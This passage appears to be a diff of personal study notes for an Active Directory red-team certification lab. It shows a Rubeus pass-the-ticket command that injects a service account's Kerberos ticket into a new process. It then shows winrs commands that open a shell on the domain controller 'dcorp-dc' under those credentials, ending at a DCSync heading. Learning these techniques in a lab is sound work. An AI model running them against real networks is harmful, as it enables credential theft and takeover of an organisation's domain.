AbdullahZuhair21/CRTP2/README.md

 #1- Create a new process & inject the ticket init
 C:\Windows\system32> C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:<aes256key> /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

-#2- Access the DC from the new process
+#2- Access the DC from the new process  #remember that this is logon type 9, means you will still have the same username in your CMD.
+However, if you use winrs to connect to the machine you will have the new creds
-winrs -r:dcorp-dc cmd /c set username
+winrs -r:dcorp-dc cmd /c set username  #show the username winrs -r:dcorp-dc cmd  #interactive CMD with new creds

 DCSync